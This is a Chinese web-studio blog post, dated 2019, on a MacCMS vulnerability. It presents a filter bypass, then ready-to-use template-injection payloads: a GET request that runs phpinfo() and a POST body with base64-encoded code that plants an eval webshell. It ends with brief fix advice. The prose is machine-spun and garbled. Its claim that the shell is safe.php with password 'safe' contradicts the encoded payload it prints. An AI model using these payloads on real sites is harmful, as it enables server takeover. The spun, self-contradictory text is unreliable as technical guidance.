13186439127
您的当前位置:主页 > 新闻资讯 > 建站经验 >

「西藏seo」苹果cms网站漏洞修复解决办法

来源:小关工作室 时间:2019-04-25 浏览量:

苹果cms体系,是现在许多影戏网站都在利用的一套网站体系,开源,免费,扩展性较好,支持一键收罗,伪静态化,高并发的同时承载,得到的许多站长的喜好,于克日被网站宁静检测发明,maccms存在网站毛病,sql注入盲射获取数据库的治理员账号暗码,关于该毛病的详情,我们细致阐发看下.

maccms毛病阐发与修复

苹果CMS接纳的是php语言开辟的代码,利用的数据库是mysql范例,这种架构是比力常用的,也是比力稳固的,但是在宁静方面出现的题目是比力多的,这次发明的是sql注入毛病,在网站的根目次下的inc文件里的module目次下的vod.php代码如下图所示:

代码里的empty($wd函数,在举行判定假如是,大概不是的逻辑历程当中,会将前段用户访问带来的参数,举行宁静过滤,我们跟进代码来追寻到苹果CMS的设置文件,在function.php设置文件代码李看到对网站的全部哀求方法包罗get、post、cookies的提交方法都逼迫性的举行了宁静转义。网站毛病题目的产生就在这里.

我们细致又发明,maccms利用了360宁静提供的防备sql注入拦截代码。360的防备sql注入是好几年前开辟,并公然在网络上的,已经好久没有更新维护了而且还存在sql注入代码绕过的环境,参数值之间举行实体转换的时间,360的sql拦截规矩没有对空缺符以及反斜杠举行拦截,导致可以绕过插入恶意参数,直接哀求到苹果cms后端数据库中去,获取苹果CMS的治理员账号暗码。

我们来看下怎样使用苹果CMS的毛病,从上面毛病产生的细节里可以看出,是由于拦截sql注入语句的历程中存在可以被绕过的毛病。我们来利用%0b,以及空格对代码举行注入,sql语句在拼接中,可以插入反斜杠举行单引号的报错,从而绕过苹果CMS的宁静拦截。语句如下:

GET哀求:

http://127.0.0.1/index.PHP?m=vod-search&wd={if-A:phpinfo()}{endif-A}

可以直接看php的详细信息

POST哀求

可以直接获取webshell

http://127.0.0.1/index.PHP?m=vod-search

POST内容如下:

wd={if-A:print(fputs%28fopen%28_decode%28Yy5waHA%29,w%29,_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

可以直接天生带有一句话木马后门的代码,文件名为safe.php,一句话木马链接暗码是safe.

怎样修复苹果cms网站毛病呢?

对网站毛病的修复我们要知道毛病产生的缘故原由,以及为何会绕过苹果CMS的宁静过滤,maccms利用的addslash宁静函数,sql中没有加单引号的宁静防护,in字句也很轻易忘记加引号,再一个后期处置惩罚宁静过滤的时间可以插入单引号,stripslash导致可以参加单引号,编解码导致绕过addslash,利用urldecode编码举行注入绕过,凭据上面提出的毛病绕过,我们SINE宁静提出毛病修复的发起是:对URL解码举行双层的转义,对get,post,cookies的拦截规矩举行宁静更新,增强空格,以及百分标记的拦截,假如对步伐代码不认识的话发起咨询专业的网站宁静公司来处置惩罚办理。

技术支持:商丘网站建设Copyright © 2013-2018 小关工作室 版权所有豫ICP备17039955号